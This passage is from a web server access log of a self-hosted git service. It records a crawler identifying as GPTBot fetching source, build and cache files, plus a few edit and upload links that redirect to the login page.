"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:43:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11186] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11965] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:17:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" +[17/Feb/2026:17:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" +[17/Feb/2026:17:43:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:43:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:43:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:17:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11544] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:17:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:17:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 10483] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" +[17/Feb/2026:17:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" +[17/Feb/2026:17:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" +[17/Feb/2026:17:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" +[17/Feb/2026:17:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11091] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" +[17/Feb/2026:17:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10684] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:43:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 11098] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 11093] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 11101] [Gzip 3.02] [Sent-to 